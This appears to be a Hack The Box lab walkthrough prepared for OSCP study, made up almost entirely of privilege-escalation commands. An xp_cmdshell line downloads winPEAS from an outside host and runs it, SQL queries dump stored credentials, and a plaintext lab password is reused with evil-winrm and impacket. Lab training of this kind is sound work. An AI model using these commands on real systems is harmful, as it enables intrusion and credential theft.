Vonnie Hudson
How To Hack The Box To Your OSCP (The Bonus Boxes)
================================
PRIVILEGE ESCALATION
--------------------------------

xp_cmdshell powershell curl 10.10.16.5/winPEASx64.exe -outfile C:\\programdata\\winPEASx64.exe
xp_cmdshell C:\\programdata\\winPEASx64.exe

SELECT NAME from SYS.DATABASES;
SELECT TABLE_NAME from ScrambleHR.INFORMATION_SCHEMA.TABLES;
SELECT * FROM ScrambleHR.dbo.Employees;

# MITRE ATT&CK T1552 Unsecured Credentials
SELECT * FROM ScrambleHR.dbo.UserImport;

sudo vim /etc/krb5.conf
SCRM.LOCAL = {
	kdc = dc1.scrm.local
}

pwsh
Enter-PSSession dc1.scrm.local -Credential MiscSvc  
 ScrambledEggs9900

Install-Module -Name PSWSMan -Scope AllUsers
Install-WSMan
exit

sudo pwsh
Enter-PSSession dc1.scrm.local -Credential scrm.local\MiscSvc  
 ScrambledEggs9900

sudo evil-winrm --realm SCRM.LOCAL --ip DC.SCRM.LOCAL

sudo python3 /opt/impacket/examples/smbclient.py -no-pass -k scrm.local/MiscSvc:ScrambledEggs9900@dc1.scrm.local